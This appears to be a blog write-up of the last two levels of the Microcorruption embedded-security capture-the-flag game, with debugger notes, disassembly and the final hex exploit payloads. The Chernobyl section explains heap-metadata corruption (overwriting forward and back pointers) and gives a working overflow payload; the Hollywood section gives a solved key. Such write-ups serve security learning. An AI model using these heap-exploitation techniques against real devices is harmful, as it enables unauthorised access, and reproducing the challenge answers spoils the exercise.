Password (Hex encoded input): 41414141414141414141414141414141415446304430443044
Password (Hex encoded input): 30127f00b012fc45

Type “reset”, “solve”, and enter the password.

 

Level 17: Chernobyl

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the
manager.

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   02.  It   contains  the   all-new
vault-manager software.

Solution:
Break main and type “c” twice:

Input: aaaa bbbb
c
Input: aaaa bbb

Step through the program:
s …
s …
s …
s …

Notice the stack pointer is just at the start of our name.

Continue stepping through the program.
s …
s …
s …
s …

Notice:
0x4ce6:  jnz    #0x4bbe <run+0x58>
0x4bbe is cmp.b    #0x61, r15
0x61 = a

Continue stepping through the program.
s …
s …

Notice:
0x4bc2:  jne    #0x4c38 <run+0xd2>
0x4c38 is    cmp.b    #0x6e, r15
0x6e = n

Continue stepping through the program.
s …
s …
s …
s …
s …

Notice:
4bdc:    mov.b    @r11, r15

s …

Notice r15 now holds our first b

Continue stepping through the program.
s

The process repeats itself with the pin.

Pay attention to 49cc <get_from_table>. We will be stepping through and examining it.

Break at 49cc and step through it.
break 49cc
c
s …
s …
s …
s …
s …
s …
s …
s …
s …
s …

s …

The hash function gets called.

Notice also that further down, rehash calls both malloc and free.

As in the Algiers level, the key is to manipulate header metadata.
We need to set the backwards pointer (bk) as the destination address, and forward pointer (fd) as the return address.

Note that we can actually chain entries in the program by using “;”, similar to how we would perform command injections in other programs.

There is space for five entries per chain, and the sixth entry will overwrite.
Also important to note is that the new memory chunks are stored right after the last allocated chunk.

Craft a Python script to solve the challenge.

python chernobyl.py

Password (Hex encoded input): 6e6577203020313b6e6577203820313b6e6577204820313b6e6577205020313b6e657720ca3d0101feff3420313b6e657720ca3da250b9f48a505c51feff3020313b6e6577205820313b6e6577206820313b6e6577207020313b6e6577207820313b6e657720303020313b6e657720303820313b324000ff30401000

Type “reset”, “solve”, and enter the password.

 

Level 18: Hollywood

OVERVIEW

– New randomization improves code security.
– This lock is not attached to any hardware security module.
DETAILS

The LockIT Pro a.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 04. Our developers have included a new
hardware random number generator, making it impossible to know
where the password will be. We apologize again for making it too
easy for the password to be recovered. Those responsible for
sacking the engineers who were previously sacked have been sacked.
Solution:

Everything is randomized, so we have to step through all of the program.

We get the following algorithm that deals with user input:

mov #2600 r5
clr r6
add @r5, r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
tst 0x0(r5)
mov sr, r7
and #0x2, r7
rra r7
xor #0x1, r7
swpb    r7
rra r7
sxt r7
swpb    r7
sxt r7
mov #0x4b18, r8
and r7 r8
and #0x47aa, r7
add r7, r8
clr r7
mov r8, r12
cmp #0xfeb1, r4
mov sr, r7
clr r4
cmp #0x9298, r6
and sr, r7
clr r6
rra r7
xor #0x1, r7
swpb r7
rra r7
rra r7
rra r7
rra r7
bis r7, sr
mov #0xff00, sr
call #0x10

We craft a script to generate the key:

Run the script:
ruby hollywood.rb

Password (Hex encoded input): 1220833eef6b

Type “reset”, “solve”, and enter the password.

 

— Microcorruption Finished — 

 

Notes on the CTF: Very fun and educational challenges.The user interface looked great and with the inclusion of the assembler and the manual, you had all you needed to complete the challenges.